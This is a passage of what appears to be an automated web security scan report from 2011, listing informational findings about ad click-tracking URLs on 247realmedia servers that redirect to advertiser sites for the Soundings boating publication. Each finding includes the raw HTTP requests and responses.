Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:03:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://clk.redcated/go/289553367/direct;ai.198788117;ct.1/01
Content-Length: 333
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:37 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://clk.atdmt.com/go/289553367/direct;ai.198788117;ct.1/01">here</a>
...[SNIP]...

17.203. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

17.204. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247919265/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247919265/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247919265/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

17.205. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

17.206. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/126580716/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/126580716/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/126580716/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 402
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S">here</a>
...[SNIP]...

17.207. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/133886311/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/133886311/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/133886311/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

17.208. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1381389243/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1381389243/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1381389243/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 16:59:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

17.209. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1410609386/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1410609386/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1410609386/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

17.210. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1443540246/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1443540246/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1443540246/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 16:59:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

17.211. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1462172569/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1462172569/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1462172569/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.myonlinepubs.com/publication?i=59161
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.myonlinepubs.com/publication?i=59161">here</a>
...[SNIP]...

17.212. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663408298/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663408298/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663408298/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 16:59:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

17.213. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/167914676/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/167914676/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/167914676/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

17.214. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790696998/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790696998/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790696998/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

17.215. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1813901630/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1813901630/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1813901630/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

17.216. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2021312465/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2021312465/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2021312465/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

